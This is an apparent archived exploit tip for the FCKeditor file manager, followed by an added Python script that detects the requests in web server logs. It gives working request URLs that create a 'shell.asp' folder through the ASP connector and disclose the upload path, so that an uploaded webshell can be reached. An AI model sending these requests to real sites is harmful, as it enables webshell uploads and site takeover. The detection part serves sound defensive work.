FCKeditor upload vulnerability: finding the upload path

ID MYHACK58:62201026914
Type myhack58
Reporter Anonymous
Modified 2010-05-12T00:00:00


The upload method commonly circulated online looks like this:

http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

After uploading, the old path could not be found. After testing a bit, I found that

FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

can disclose the path and displays the following content:

Get the path from it, then open it directly to see the chick!
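
For defenders, the two connector requests shown above leave a recognizable trace in web server logs. The following is an added example, not part of the original post: a Python script that flags them in W3C extended (IIS-style) logs. The log lines, IP addresses and field layout are constructed, and the list of script extensions is an assumption.

```python
import re
from urllib.parse import parse_qs

# Connector endpoints in the two layouts quoted on this page (any server-side language).
CONNECTOR = re.compile(
    r"/editor/filemanager/(?:browser/default/)?connectors/\w+/connector\.\w+$", re.I)
# A folder name ending in a server-side script extension (assumed list).
SCRIPT_DIR = re.compile(r"\.(?:asp|asa|cer|aspx|php)(?:/|$)", re.I)

def classify(stem, query):
    """Return a finding for one request, or None if it does not hit a connector."""
    if not CONNECTOR.search(stem):
        return None
    q = {k.lower(): v[0] for k, v in parse_qs(query).items()}  # also decodes %2F
    command = q.get("command", "").lower()
    if command == "createfolder":
        names = q.get("currentfolder", "") + "/" + q.get("newfoldername", "")
        if SCRIPT_DIR.search(names):
            return "CreateFolder with script-style folder name"
        return "CreateFolder"
    if command in ("getfolders", "getfoldersandfiles"):
        return "folder listing (response reveals upload path)"
    return "connector access"

def scan(lines):
    """Return [(client_ip, finding)], reading column order from the #Fields header."""
    cols, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            cols = line.split()[1:]
            continue
        if line.startswith("#") or not cols:
            continue
        rec = dict(zip(cols, line.split()))
        finding = classify(rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", ""))
        if finding:
            hits.append((rec.get("c-ip"), finding))
    return hits

# Constructed sample log (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2010-05-12 09:14:02 192.0.2.10 GET /fckeditor/editor/filemanager/connectors/asp/connector.asp Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 200",
    "2010-05-12 09:14:40 192.0.2.10 GET /FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 200",
    "2010-05-12 09:15:01 198.51.100.7 GET /index.asp - 200",
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

Any hit from an address that is not a logged-in content editor is worth reviewing, since the connector should not be reachable without authentication.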